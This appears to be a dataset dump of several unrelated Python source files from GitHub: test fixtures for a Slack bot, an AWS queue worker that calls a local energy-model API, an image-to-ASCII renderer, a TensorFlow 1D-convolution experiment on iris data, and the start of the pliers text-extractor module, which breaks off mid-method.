try:\n os.remove(settings.DB_PATH)\n except FileNotFoundError:\n pass\n\n\n@dataclass\nclass MockRecordingClient:\n client: WebClient\n recorder: Mock\n\n\n@dataclass\nclass MockRecordingApp:\n app: App\n recorder: Mock\n\n\n@pytest.fixture\ndef mock_client():\n test_recorder = Mock()\n setup_mock_web_api_server(test_recorder)\n mock_api_server_base_url = \"http://localhost:8888\"\n\n yield MockRecordingClient(\n client=WebClient(\n token=\"xoxb-valid\",\n base_url=mock_api_server_base_url,\n ),\n recorder=test_recorder,\n )\n cleanup_mock_web_api_server(test_recorder)\n\n\n@pytest.fixture\ndef mock_app(mock_client):\n yield MockRecordingApp(\n app=App(client=mock_client.client, raise_error_for_unhandled_request=True),\n recorder=mock_client.recorder,\n )\n","repo_name":"ebmdatalab/ebmbot","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"20007979288","text":"from signal import signal, SIGINT\nimport boto3\nimport json\nimport requests\nimport logging\nimport time\nfrom subprocess import Popen, PIPE, STDOUT\nimport sys\n\nfrom credentials import get_secret\nfrom rds_handler import SqlHandler\nfrom helper import get_message_from_queue, get_etm_curves, build_tarball, save_etm_curves_to_s3, push_message_to_next_queue, delete_message_from_queue\nfrom config import *\n\nif logging.getLogger().hasHandlers():\n logging.getLogger().setLevel(logging.INFO)\n LOGGER = logging.getLogger(__name__)\nelse:\n LOG_FORMAT = ('%(levelname) -10s %(asctime)s %(name) -30s %(funcName) '\n '-35s %(lineno) -5d: %(message)s')\n LOGGER = logging.getLogger(__name__)\n logging.basicConfig(level=logging.INFO, format=LOG_FORMAT)\n\n\ndef handler(signal_received, frame):\n print('SIGINT or CTRL-C detected. Exiting gracefully')\n sys.exit(0)\n\n\nif __name__ == '__main__':\n total_timeout_time = 0\n db_secret = get_secret(\"prod/gridmaster/overview/readwrite\")\n if ENVIRONMENT == 'local':\n db_secret['host'] = 'host.docker.internal'\n sql_handler = SqlHandler(db_secret)\n LOGGER.info('starting flask')\n proc = Popen(['pipenv', 'run', 'flask', 'run', '--host=0.0.0.0'], stdout=PIPE, stderr=STDOUT, cwd=FLASK_CWD)\n signal(SIGINT, handler)\n time.sleep(3)\n s3_client = boto3.client('s3')\n url = \"http://localhost:5000/api/v1/create_with_context/\"\n with open('2021_hic_description.esdl', 'r') as f:\n start_esdl = f.read()\n while True:\n body, receipt_handle = get_message_from_queue(ETM_QUEUE_URL)\n if not body:\n # There is no message in the queue, wait and try again\n LOGGER.info('Queue is empty, waiting for 5 seconds')\n time.sleep(5)\n if total_timeout_time > CONTAINER_TIMEOUT:\n # If no messages received for timeout limit, exit container/loop\n LOGGER.info('Container timeout exceeded, shutting down')\n RUNNING = False\n break\n total_timeout_time += 5\n continue\n total_timeout_time = 0\n logging.info('starting ETM scenario creation for scenarioId: {}'.format(body['scenarioId']))\n response = s3_client.get_object(\n Bucket=BUCKET_NAME,\n Key=body['baseEsdlLocation']\n )\n base_esdl = response['Body'].read().decode('utf-8')\n # Load ETM context scenario ID from S3\n response = s3_client.get_object(\n Bucket=BUCKET_NAME,\n Key=body['contextScenarioLocation']\n )\n context_scenario = json.loads(response['Body'].read().decode('utf-8'))\n # call local ETM API\n payload = requests.urllib3.request.urlencode({'energy_system_start_situation': start_esdl.encode('utf-8'),\n 'energy_system_end_situation': base_esdl.encode('utf-8'),\n 'scenario_id': context_scenario['contextScenario']})\n headers = {\n 'Content-Type': 'application/x-www-form-urlencoded'\n }\n try:\n etm_response = requests.request(\"POST\", url, headers=headers, data=payload, timeout=45)\n if etm_response.status_code == 422:\n LOGGER.error('ETM returned 422 for scenarioId {}, with message: {}'.format(\n body['scenarioId'], etm_response.text))\n delete_message_from_queue(ETM_QUEUE_URL, receipt_handle)\n continue\n elif etm_response.status_code == 429:\n LOGGER.error('ETM returned 429 for scenarioId {}, with message: {}, returning message to queue'.format(\n body['scenarioId'], etm_response.text))\n continue\n elif etm_response.status_code != 200:\n LOGGER.error('ETM API returned an error, exiting function. Error code: {}, with message: {}'.format(\n etm_response.status_code, etm_response.text))\n continue\n except requests.exceptions.ConnectionError as ex:\n LOGGER.error(ex)\n continue\n except requests.exceptions.ReadTimeout as ex:\n LOGGER.error(ex)\n logging.error('Failed ETM scenario creation for scenarioId: {} due to timeout, shutting down'.format(body['scenarioId']))\n break\n LOGGER.info('ETM etm_response is {} for scenarioId {}'.format(etm_response.status_code, body['scenarioId']))\n etm_scenario_id = json.loads(etm_response.text)['scenario_id']\n etm_curves = get_etm_curves(etm_scenario_id)\n tarball = build_tarball(etm_curves)\n s3_key = save_etm_curves_to_s3(body, tarball)\n\n body['calculationState'] = 'etmProcessed'\n body['etmScenarioId'] = etm_scenario_id\n body['etmResultLocation'] = s3_key\n\n LOGGER.info('Successfully created ETM scenario with scenarioId: {}'.format(body['scenarioId']))\n with open('sql/update_scenario.sql', 'r') as f:\n sql_stmt = f.read()\n sql_handler.update_scenario_state(sql_stmt, [body])\n delete_message_from_queue(ETM_QUEUE_URL, receipt_handle)\n push_message_to_next_queue(ESDL_UPDATER_QUEUE_URL, body)\n\n proc.terminate()\n sys.exit()\n","repo_name":"GridMaster2022/etm-api","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5278,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21833636487","text":"from typing import List, Tuple\nfrom PIL import Image, ImageFont, ImageDraw\n\nclass Img2Text:\n __CHARS = \"\"\"0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~ \"\"\"\n __FONT = ImageFont.truetype(\"arial.ttf\", 20)\n def __init__(self):\n m = sorted([(self._mean_char_pixel(c), c) for c in self.__CHARS])\n self.chars = [c for _, c in m]\n self.ws = [(w - m[0][0]) / (m[-1][0] - m[0][0]) for w, _ in m]\n\n def _mean_char_pixel(self, char: str) -> float:\n img = Image.new('L', self.__FONT.getbbox(char)[2:], color=255)\n draw = ImageDraw.Draw(img)\n draw.text((0, 0), char, font=self.__FONT, fill=0)\n pixles = img.getdata()\n return -sum(pixles) // len(pixles)\n\n def render(self, img, new_size: Tuple[int, int]) -> str:\n rimg = img.resize(new_size, Image.HAMMING)\n pixels = self._norm_img(rimg.getdata())\n chars = [self._find(p) for p in pixels]\n batches = [chars[i:i+rimg.size[0]] for i in range(0, len(chars), rimg.size[0])]\n return \"\\n\".join((\"\".join(b) for b in batches))\n \n def _norm_img(self, pixels: List[int]) -> List[float]:\n min_val, max_val = min(pixels), max(pixels)\n return [(p - min_val) / (max_val - min_val) for p in pixels]\n\n def _find(self, pixel: float) -> str:\n l, h = 0, len(self.ws) -1\n while l <= h:\n mid = (h + l) // 2\n if pixel < self.ws[mid]: h = mid - 1\n elif pixel > self.ws[mid]: l = mid + 1\n else: return self.chars[mid]\n return self.chars[l] if (self.ws[l] - pixel) < (pixel - self.ws[h]) else self.chars[h]\n\n\nif __name__ == \"__main__\":\n img = Image.open(\"badger.jpg\").convert(\"L\")\n img2Text = Img2Text()\n print(img2Text.render(img, (128, 64)))\n\n","repo_name":"KucicM/img2ascii","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17325457418","text":"import tensorflow as tf\nimport numpy as np\nfrom sklearn import datasets\nfrom tensorflow.python.framework import ops\nfrom sklearn.preprocessing import OneHotEncoder\n\niris = datasets.load_iris()\n#print(iris.data)\n#print(iris.target)\nops.reset_default_graph()\nconv_size =2\nstride_size = 1\nmaxpool_size = 2\n\n# Create graph session 创建初始图结构\nops.reset_default_graph()\nsess = tf.Session()\n#placeholder\n\ndef generatebatch(X,Y,n_examples, batch_size):\n for batch_i in range(n_examples // batch_size):\n start = batch_i*batch_size\n end = start + batch_size\n batch_xs = X[start:end]\n batch_ys = Y[start:end]\n yield batch_xs, batch_ys # 生成每一个batch\n\n# --------Convolution--------\ndef conv_layer_1d(input_1d, my_filter, stride):\n # TensorFlow's 'conv2d()' function only works with 4D arrays:\n # [batch, height, width, channels], we have 1 batch, and\n # width = 1, but height = the length of the input, and 1 channel.\n # So next we create the 4D array by inserting dimension 1's.\n # 关于数据维度的处理十分关键,因为tensorflow中卷积操作只支持四维的张量,\n # 所以要人为的把数据补充为4维数据[1,1,25,1]\n #input_2d = tf.expand_dims(input_1d, 0)\n input_3d = tf.expand_dims(input_1d, 1)\n input_4d = tf.expand_dims(input_3d, 3)\n # Perform convolution with stride = 1, if we wanted to increase the stride,\n # to say '2', then strides=[1,1,2,1]\n convolution_output = tf.nn.conv2d(input_4d, filter=my_filter, strides=[1, 1, stride, 1], padding=\"VALID\")\n # Get rid of extra dimensions 去掉多余的层数,只保留数字\n conv_output_1d = tf.squeeze(convolution_output)\n return (conv_output_1d)\n\n# --------Activation--------\ndef activation(input_1d):\n return (tf.nn.relu(input_1d))\n\n\n# --------Fully Connected--------\ndef fully_connected(input_layer,num_outputs):\n\n # First we find the needed shape of the multiplication weight matrix:\n # The dimension will be (length of input) by (num_outputs)\n\n weight_shape = tf.squeeze(tf.stack([[tf.shape(input_layer)[0]], [tf.shape(input_layer)[1]],[num_outputs]]))\n\n #weight_shape = [num_outputs]\n # squeeze函数用于去掉维度为1的维度。保留数据。\n # Initialize such weight\n # 初始化weight\n input_flat = tf.reshape(input_layer, [-1, 2])\n weight = tf.random_normal([2,3], stddev=0.1)\n #weight = tf.random_normal(weight_shape, stddev=0.1)\n #print(sess.run(weight))\n # Initialize the bias\n # 初始化bias\n bias = tf.random_normal(shape=[num_outputs])\n # Make the 1D input array into a 2D array for matrix multiplication\n # 将一维的数组添加一维成为2维数组\n input_layer_2d = tf.expand_dims(input_layer, 2)\n # Perform the matrix multiplication and add the bias\n\n full_output = tf.add(tf.matmul(input_flat, weight), bias)\n softmax_output = tf.nn.softmax(full_output)\n # Get rid of extra dimensions\n # 去掉多余的维度只保留数据\n full_output_1d = tf.squeeze(full_output)\n return (softmax_output)\n\n# --------Max Pool--------\ndef max_pool(input_1d, width, stride):\n # Just like 'conv2d()' above, max_pool() works with 4D arrays.\n # [batch_size=1, width=1, height=num_input, channels=1]\n # 因为在处理卷积层的结果时,使用squeeze函数对结果输出进行降维,所以此处要将最大池化层的维度提升为4维\n #input_2d = tf.expand_dims(input_1d, 0)\n input_3d = tf.expand_dims(input_1d, 1)\n input_4d = tf.expand_dims(input_3d, 3)\n # Perform the max pooling with strides = [1,1,1,1]\n # If we wanted to increase the stride on our data dimension, say by\n # a factor of '2', we put strides = [1, 1, 2, 1]\n # We will also need to specify the width of the max-window ('width')\n\n pool_output = tf.nn.max_pool(input_4d, ksize=[1, 1, width, 1],\n strides=[1, 1, stride, 1],\n padding='VALID')\n # Get rid of extra dimensions\n pool_output_1d = tf.squeeze(pool_output)\n return (pool_output_1d)\n\n#输入层\n\ntf_X = tf.placeholder(tf.float32,[None,4])\ntf_Y = tf.placeholder(tf.float32,[None,3])\n\nprint(\"---xiaoyao--->\")\nex_2d_y = iris.target.reshape(-1,1)\n\nfeed_Y = OneHotEncoder().fit_transform(ex_2d_y).todense()\nfeed_dict = {tf_X: iris.data,tf_Y:feed_Y}\n\nconv_filter_w1 = tf.Variable(tf.random_normal([1, 3, 1, 10]))\nconv_filter_b1 = tf.Variable(tf.random_normal([10]))\n\nmy_filter = tf.Variable(tf.random_normal(shape=[1, conv_size, 1, 1]))\nconv_filter_b1 = tf.Variable(tf.random_normal([1]))\n\nmy_convolution_output = conv_layer_1d(tf_X, my_filter, stride=stride_size)\nmy_activation_output = activation(my_convolution_output)\nmy_maxpool_output = max_pool(my_activation_output, width=maxpool_size, stride=stride_size)\n\nmy_full_output = fully_connected(my_maxpool_output,3)\n\ninit = tf.global_variables_initializer()\n\n\n\n\nprint('>>>> 1D Data <<<<')\n\n# Convolution Output\n#print('Input = array of length %d'%(tf_X.shape.as_list()[0])) # 25\n#print('Convolution w/ filter, length = %d, stride size = %d, results in an array of length %d:'%\n #(conv_size, stride_size, my_convolution_output.shape.as_list()[0])) # 21\n#print(sess.run(my_convolution_output, feed_dict=feed_dict))\n\n#print(sess.run(my_full_output, feed_dict=feed_dict))\nloss = -tf.reduce_mean(tf_Y*tf.log(tf.clip_by_value(my_full_output,1e-11,1.0)))\n\n#train_step = tf.train.AdamOptimizer(1e-3).minimize(loss)\ntrain_op = tf.train.GradientDescentOptimizer(learning_rate=0.001).minimize(loss)\ny_pred = tf.arg_max(my_full_output,1)\nbool_pred = tf.equal(tf.arg_max(tf_Y,1),y_pred)\n\naccuracy = tf.reduce_mean(tf.cast(bool_pred,tf.float32)) # 准确率\n\nsess.run(init)\nfor batch_xs, batch_ys in generatebatch(iris.data, feed_Y, feed_Y.shape[0], 10): # 每个周期进行MBGD算法\n #print(sess.run(loss, feed_dict=feed_dict))\n print(\"---------\")\n print(sess.run([tf_Y,y_pred,accuracy], feed_dict={tf_X: batch_xs, tf_Y: batch_ys}))\n print(\"---------\")\n\n # print(sess.run(tf.cast(bool_pred,tf.float32) , feed_dict={tf_X: batch_xs, tf_Y: batch_ys}))\n #print(sess.run(accuracy, feed_dict={tf_X: batch_xs, tf_Y: batch_ys}))\n#print(sess.run(loss, feed_dict=feed_dict))\n\"\"\"\n# Activation Output\nprint('\\nInput = above array of length %d'%(my_convolution_output.shape.as_list()[0])) # 21\nprint('ReLU element wise returns an array of length %d:'%(my_activation_output.shape.as_list()[0])) # 21\nprint(sess.run(my_activation_output, feed_dict=feed_dict))\n\n\n# Max Pool Output\nprint('\\nInput = above array of length %d'%(my_activation_output.shape.as_list()[0])) # 21\nprint('MaxPool, window length = %d, stride size = %d, results in the array of length %d'%\n (maxpool_size, stride_size, my_maxpool_output.shape.as_list()[0])) # 17\nprint(sess.run(my_maxpool_output, feed_dict=feed_dict))\n\n# Fully Connected Output\nprint('\\nInput = above array of length %d'%(my_maxpool_output.shape.as_list()[0])) # 17\nprint('Fully connected layer on all 4 rows with %d outputs:'%\n (my_full_output.shape.as_list()[0])) # 5\nprint(sess.run(my_full_output, feed_dict=feed_dict))\n\"\"\"\n\n\n\n\n\n\n\n\n\n\n\n\n\"\"\"\n# 定义向量\ninput = np.array(np.arange(1, 1+10*8*16).reshape([10, 8, 16]), dtype=np.float32)\nprint(input.shape)\n\n# 卷积核\nkernel = np.array(np.arange(1, 1+5*16*3), dtype=np.float32).reshape([5, 16, 3])\nprint(kernel.shape)\n\n# 进行conv1d卷积\nconv1out = tf.nn.conv1d(input, kernel, 1, 'VALID')\n\ninit = tf.global_variables_initializer()\n\nwith tf.Session() as sess:\n # 初始化\n sess.run(init)\n # 输出卷积值\n print(sess.run(conv1out).shape)\n print(sess.run(conv1out))\n\"\"\"","repo_name":"yaoxiaohappy/Algorithm_python","sub_path":"algorithm/deepLearning/Conv_1d.py","file_name":"Conv_1d.py","file_ext":"py","file_size_in_byte":7645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27987003424","text":"'''\nExtractors that operate primarily or exclusively on Text stimuli.\n'''\nimport sys\nimport itertools\nimport logging\n\nimport numpy as np\nimport pandas as pd\nimport scipy\nimport nltk\nfrom nltk.sentiment.vader import SentimentIntensityAnalyzer\n\nfrom pliers.stimuli.text import TextStim, ComplexTextStim\nfrom pliers.extractors.base import Extractor, ExtractorResult\nfrom pliers.support.exceptions import PliersError\nfrom pliers.support.decorators import requires_nltk_corpus\nfrom pliers.datasets.text import fetch_dictionary\nfrom pliers.transformers import BatchTransformerMixin\nfrom pliers.utils import (attempt_to_import, verify_dependencies, flatten,\n listify)\n\n\nkeyedvectors = attempt_to_import('gensim.models.keyedvectors', 'keyedvectors',\n ['KeyedVectors'])\nsklearn_text = attempt_to_import('sklearn.feature_extraction.text', 'sklearn_text',\n ['CountVectorizer'])\nspacy = attempt_to_import('spacy')\ntransformers = attempt_to_import('transformers')\n\nclass TextExtractor(Extractor):\n\n ''' Base Text Extractor class; all subclasses can only be applied to text.\n '''\n _input_type = TextStim\n\n\nclass ComplexTextExtractor(Extractor):\n\n ''' Base ComplexTextStim Extractor class; all subclasses can only be\n applied to ComplexTextStim instance.\n '''\n _input_type = ComplexTextStim\n\n def _extract(self, stim):\n ''' Returns all words. '''\n props = [(e.text, e.onset, e.duration) for e in stim.elements]\n vals, onsets, durations = map(list, zip(*props))\n return ExtractorResult(vals, stim, self, ['word'], onsets, durations)\n\n\nclass DictionaryExtractor(TextExtractor):\n\n ''' A generic dictionary-based extractor that supports extraction of\n arbitrary features contained in a lookup table.\n\n Args:\n dictionary (str, DataFrame): The dictionary containing the feature\n values. Either a string giving the path to the dictionary file,\n or a pandas DF. Format must be tab-delimited, with the first column\n containing the text key used for lookup. Subsequent columns each\n represent a single feature that can be used in extraction.\n variables (list): Optional subset of columns to keep from the\n dictionary.\n missing: Value to insert if no lookup value is found for a text token.\n Defaults to numpy's NaN.\n '''\n\n _log_attributes = ('dictionary', 'variables', 'missing')\n VERSION = '1.0'\n\n def __init__(self, dictionary, variables=None, missing=np.nan):\n if isinstance(dictionary, str):\n self.dictionary = dictionary # for TranformationHistory logging\n dictionary = pd.read_csv(dictionary, sep='\\t', index_col=0)\n else:\n self.dictionary = None\n self.data = dictionary\n if variables is None:\n variables = list(self.data.columns)\n else:\n self.data = self.data[variables]\n self.variables = variables\n # Set up response when key is missing\n self.missing = missing\n super().__init__()\n\n def _extract(self, stim):\n if stim.text not in self.data.index:\n vals = pd.Series(self.missing, self.variables)\n else:\n vals = self.data.loc[stim.text].fillna(self.missing)\n vals = vals.to_dict()\n return ExtractorResult(np.array([list(vals.values())]), stim, self,\n features=list(vals.keys()))\n\n\nclass PredefinedDictionaryExtractor(DictionaryExtractor):\n\n ''' A generic Extractor that maps words onto values via one or more\n pre-defined dictionaries accessed via the web.\n\n Args:\n variables (list or dict): A specification of the dictionaries and\n column names to map the input TextStims onto. If a list, each\n element must be a string with the format 'dict/column', where the\n value before the slash gives the name of the dictionary, and the\n value after the slash gives the name of the column in that\n dictionary. These names can be found in the dictionaries.json\n specification file under the datasets submodule. Examples of\n valid values are 'affect/V.Mean.Sum' and\n 'subtlexusfrequency/Lg10WF'. If a dict, the keys are the names of\n the dictionary files (e.g., 'affect'), and the values are lists\n of columns to use (e.g., ['V.Mean.Sum', 'V.SD.Sum']).\n missing (object): Value to use when an entry for a word is missing in\n a dictionary (defaults to numpy's NaN).\n case_sensitive (bool): If True, entries in the dictionary are treated\n as case-sensitive (e.g., 'John' and 'john' are different words).\n force_retrieve (bool): If True, the source dictionary will always be\n retrieved/download, even if it exists locally. If False, a cached\n local version will be used if it exists.\n '''\n\n _log_attributes = ('variables', 'missing', 'case_sensitive')\n VERSION = '1.0'\n\n def __init__(self, variables, missing=np.nan, case_sensitive=False,\n force_retrieve=False):\n\n self.case_sensitive = case_sensitive\n\n if isinstance(variables, (list, tuple)):\n _vars = {}\n for v in variables:\n v = v.split('/')\n if v[0] not in _vars:\n _vars[v[0]] = []\n if len(v) == 2:\n _vars[v[0]].append(v[1])\n variables = _vars\n\n dicts = []\n for k, v in variables.items():\n d = fetch_dictionary(k, force_retrieve=force_retrieve)\n if not case_sensitive:\n d.index = d.index.str.lower()\n if v:\n d = d[v]\n d.columns = ['{}_{}'.format(k, c) for c in d.columns]\n dicts.append(d)\n\n # Make sure none of the dictionaries have duplicate indices\n drop_dups = lambda d: d[~d.index.duplicated(keep='first')]\n dicts = [d if d.index.is_unique else drop_dups(d) for d in dicts]\n\n dictionary = pd.concat(dicts, axis=1, join='outer', sort=False)\n\n super().__init__(\n dictionary, missing=missing)\n\n\nclass LengthExtractor(TextExtractor):\n\n ''' Extracts the length of the text in characters. '''\n\n VERSION = '1.0'\n\n def _extract(self, stim):\n return ExtractorResult(np.array([[len(stim.text.strip())]]), stim,\n self, features=['text_length'])\n\n\nclass NumUniqueWordsExtractor(TextExtractor):\n\n ''' Extracts the number of unique words used in the text. '''\n\n _log_attributes = ('tokenizer',)\n VERSION = '1.0'\n\n def __init__(self, tokenizer=None):\n super().__init__()\n self.tokenizer = tokenizer\n\n @requires_nltk_corpus\n def _extract(self, stim):\n text = stim.text\n if self.tokenizer is None:\n if nltk is None:\n num_words = len(set(text.split()))\n else:\n try:\n num_words = len(set(nltk.word_tokenize(text)))\n except LookupError:\n nltk.download('punkt')\n num_words = len(set(nltk.word_tokenize(text)))\n \n else:\n num_words = len(set(self.tokenizer.tokenize(text)))\n\n return ExtractorResult(np.array([[num_words]]), stim, self,\n features=['num_unique_words'])\n\n\nclass PartOfSpeechExtractor(BatchTransformerMixin, TextExtractor):\n\n ''' Tags parts of speech in text with nltk. '''\n\n _batch_size = sys.maxsize\n VERSION = '1.0'\n\n @requires_nltk_corpus\n def _extract(self, stims):\n words = [w.text for w in stims]\n pos = nltk.pos_tag(words)\n if len(words) != len(pos):\n raise PliersError(\n \"The number of words does not match the number of tagged words\"\n \"returned by nltk's part-of-speech tagger.\")\n\n results = []\n tagset = nltk.data.load('help/tagsets/upenn_tagset.pickle').keys()\n for i, s in enumerate(stims):\n pos_vector = dict.fromkeys(tagset, 0)\n pos_vector[pos[i][1]] = 1\n values = [list(pos_vector.values())]\n results.append(ExtractorResult(values, s, self,\n features=list(pos_vector.keys())))\n\n return results\n\n\nclass WordEmbeddingExtractor(TextExtractor):\n\n ''' An extractor that uses a word embedding file to look up embedding\n vectors for text.\n\n Args:\n embedding_file (str): Path to a word embedding file. Assumed to be in\n word2vec format compatible with gensim.\n binary (bool): Flag indicating whether embedding file is saved in a\n binary format.\n prefix (str): Prefix for feature names in the ExtractorResult.\n unk_vector (numpy array or str): Default vector to use for texts not\n found in the embedding file. If None is specified, uses a\n vector with all zeros. If 'random' is specified, uses a vector with\n random values between -1.0 and 1.0. Must have the same dimensions\n as the embeddings.\n '''\n\n _log_attributes = ('wvModel', 'prefix')\n\n def __init__(self, embedding_file, binary=False, prefix='embedding_dim',\n unk_vector=None):\n verify_dependencies(['keyedvectors'])\n self.wvModel = keyedvectors.KeyedVectors.load_word2vec_format(\n embedding_file, binary=binary)\n self.prefix = prefix\n self.unk_vector = unk_vector\n super().__init__()\n\n def _extract(self, stim):\n num_dims = self.wvModel.vector_size\n if stim.text in self.wvModel:\n embedding_vector = self.wvModel[stim.text]\n else:\n unk = self.unk_vector\n if hasattr(unk, 'shape') and unk.shape[0] == num_dims:\n embedding_vector = unk\n elif unk == 'random':\n embedding_vector = 2.0 * np.random.random(num_dims) - 1.0\n else:\n # By default, UNKs will have zeroed-out vectors\n embedding_vector = np.zeros(num_dims)\n\n features = ['%s%d' % (self.prefix, i) for i in range(num_dims)]\n return ExtractorResult([embedding_vector],\n stim,\n self,\n features=features)\n\n\nclass TextVectorizerExtractor(BatchTransformerMixin, TextExtractor):\n\n ''' Uses a scikit-learn Vectorizer to extract bag-of-features\n from text.\n\n Args:\n vectorizer (sklearn Vectorizer or str): a scikit-learn Vectorizer\n (or the name in a string) to extract with. Will use the\n CountVectorizer by default. Uses supporting *args and **kwargs.\n '''\n\n _log_attributes = ('vectorizer',)\n _batch_size = sys.maxsize\n\n def __init__(self, vectorizer=None, *vectorizer_args, **vectorizer_kwargs):\n verify_dependencies(['sklearn_text'])\n if isinstance(vectorizer, sklearn_text.CountVectorizer):\n self.vectorizer = vectorizer\n elif isinstance(vectorizer, str):\n vec = getattr(sklearn_text, vectorizer)\n self.vectorizer = vec(*vectorizer_args, **vectorizer_kwargs)\n else:\n self.vectorizer = sklearn_text.CountVectorizer(*vectorizer_args,\n **vectorizer_kwargs)\n super().__init__()\n\n def _extract(self, stims):\n mat = self.vectorizer.fit_transform([s.text for s in stims]).toarray()\n results = []\n for i, row in enumerate(mat):\n results.append(\n ExtractorResult([row], stims[i], self,\n features=self.vectorizer.get_feature_names()))\n return results\n\n\nclass VADERSentimentExtractor(TextExtractor):\n\n ''' Uses nltk's VADER lexicon to extract (0.0-1.0) values for the positve,\n neutral, and negative sentiment of a TextStim. Also returns a compound\n score ranging from -1 (very negative) to +1 (very positive). '''\n\n _log_attributes = ('analyzer',)\n VERSION = '1.0'\n\n def __init__(self):\n self.analyzer = SentimentIntensityAnalyzer()\n super().__init__()\n\n @requires_nltk_corpus\n def _extract(self, stim):\n scores = self.analyzer.polarity_scores(stim.text)\n features = ['sentiment_' + k for k in scores.keys()]\n return ExtractorResult([list(scores.values())], stim, self,\n features=features)\n\n\nclass SpaCyExtractor(TextExtractor):\n\n ''' A generic class for Spacy Text extractors\n\n Uses SpaCy to extract features from text. Extracts features for every word\n (token) in a sentence.\n\n Args:\n extractor_type(str): The type of feature to extract. Must be one of\n 'doc' (analyze an entire sentence/document) or 'token'\n (analyze each word).\n features(list): A list of strings giving the names of spaCy features to\n extract. See SpacY documentation for details. By default, returns\n all available features for the given extractor type.\n model (str): The name of the language model to use.\n '''\n\n def __init__(self, extractor_type='token', features=None,\n model='en_core_web_sm'):\n\n verify_dependencies(['spacy'])\n\n try:\n self.model = spacy.load(model)\n except (ImportError, OSError) as e:\n logging.warning(\"Spacy Models ('{}') not found. Downloading and\"\n \"installing\".format(model))\n\n spacy.cli.download(model)\n self.model = spacy.load(model)\n\n logging.info('Loaded model: {}'.format(self.model))\n\n self.features = features\n self.extractor_type = extractor_type.lower()\n\n super().__init__()\n\n def _extract(self, stim):\n\n features_list = []\n elements = self.model(stim.text)\n order_list = []\n\n if self.extractor_type == 'token':\n if self.features is None:\n self.features = ['text', 'lemma_', 'pos_', 'tag_', 'dep_',\n 'shape_', 'is_alpha', 'is_stop', 'is_punct',\n 'sentiment', 'is_ascii', 'is_digit']\n\n elif self.extractor_type == 'doc':\n elements = [elem.as_doc() for elem in list(elements.sents)]\n if self.features is None:\n self.features = ['text', 'is_tagged', 'is_parsed',\n 'is_sentenced', 'sentiment']\n\n else:\n raise(ValueError(\"Invalid extractor_type; must be one of 'token'\"\n \" or 'doc'.\"))\n\n features_list = []\n for elem in elements:\n arr = []\n for feat in self.features:\n arr.append(getattr(elem, feat))\n features_list.append(arr)\n\n order_list = list(range(1, len(elements) + 1))\n\n return ExtractorResult(features_list, stim, self,\n features=self.features, orders=order_list)\n\n\nclass BertExtractor(ComplexTextExtractor):\n ''' Returns encodings from the last hidden layer of BERT or similar\n models (ALBERT, DistilBERT, RoBERTa, CamemBERT). Excludes special tokens.\n Base class for other Bert extractors.\n Args:\n pretrained_model (str): A string specifying which transformer\n model to use. Can be any pretrained BERT or BERT-derived (ALBERT, \n DistilBERT, RoBERTa, CamemBERT etc.) models listed at\n https://huggingface.co/transformers/pretrained_models.html\n or path to custom model.\n tokenizer (str): Type of tokenization used in the tokenization step.\n If different from model, out-of-vocabulary tokens may be treated \n as unknown tokens.\n model_class (str): Specifies model type. Must be one of 'AutoModel' \n (encoding extractor) or 'AutoModelWithLMHead' (language model).\n These are generic model classes, which use the value of \n pretrained_model to infer the model-specific transformers \n class (e.g. BertModel or BertForMaskedLM for BERT, RobertaModel \n or RobertaForMaskedLM for RoBERTa). Fixed by each subclass.\n framework (str): name deep learning framework to use. Must be 'pt'\n (PyTorch) or 'tf' (tensorflow). Defaults to 'pt'.\n return_input (bool): if True, the extractor returns encoded token\n and encoded word as features.\n model_kwargs (dict): Named arguments for transformer model.\n See https://huggingface.co/transformers/main_classes/model.html\n tokenizer_kwargs (dict): Named arguments for tokenizer.\n See https://huggingface.co/transformers/main_classes/tokenizer.html\n '''\n\n _log_attributes = ('pretrained_model', 'framework', 'tokenizer_type',\n 'model_class', 'return_input', 'model_kwargs', 'tokenizer_kwargs')\n _model_attributes = ('pretrained_model', 'framework', 'model_class', \n 'tokenizer_type')\n\n def __init__(self,\n pretrained_model='bert-base-uncased',\n tokenizer='bert-base-uncased',\n model_class='AutoModel',\n framework='pt',\n return_input=False,\n model_kwargs=None,\n tokenizer_kwargs=None):\n verify_dependencies(['transformers'])\n if framework not in ['pt', 'tf']:\n raise(ValueError('''Invalid framework;\n must be one of 'pt' (pytorch) or 'tf' (tensorflow)'''))\n self.pretrained_model = pretrained_model\n self.tokenizer_type = tokenizer\n self.model_class = model_class\n self.framework = framework\n self.return_input = return_input\n self.model_kwargs = model_kwargs if model_kwargs else {}\n self.tokenizer_kwargs = tokenizer_kwargs if tokenizer_kwargs else {}\n model = model_class if self.framework == 'pt' else 'TF' + model_class\n self.model = getattr(transformers, model).from_pretrained(\n pretrained_model, **self.model_kwargs)\n self.tokenizer = transformers.BertTokenizer.from_pretrained(\n tokenizer, **self.tokenizer_kwargs)\n super().__init__()\n\n def _mask_words(self, wds):\n ''' Called by _preprocess method. Takes list of words in the Stim as\n input (i.e. the .text attribute for each TextStim in the \n ComplexTextStim). If class has mask attribute, replaces word in \n the input sequence with [MASK] token based on the value of mask \n (either index in the sequence, or word to replace). Here, returns\n list of words (without masking)\n '''\n return wds\n\n def _preprocess(self, stims):\n ''' Extracts text, onset, duration from ComplexTextStim, masks target\n words (if relevant), tokenizes the input, and casts words, onsets,\n and durations to token-level lists. Called within _extract method \n to prepare input for the model. '''\n els = [(e.text, e.onset, e.duration) for e in stims.elements]\n wds, ons, dur = map(list, zip(*els))\n tok = [self.tokenizer.tokenize(w) for w in self._mask_words(wds)]\n n_tok = [len(t) for t in tok]\n stims.name = ' '.join(wds) if stims.name == '' else stims.name\n wds, ons, dur = map(lambda x: np.repeat(x, n_tok), [wds, ons, dur])\n tok = list(flatten(tok))\n idx = self.tokenizer.encode(tok, return_tensors=self.framework)\n return wds, ons, dur, tok, idx\n\n def _extract(self, stims):\n 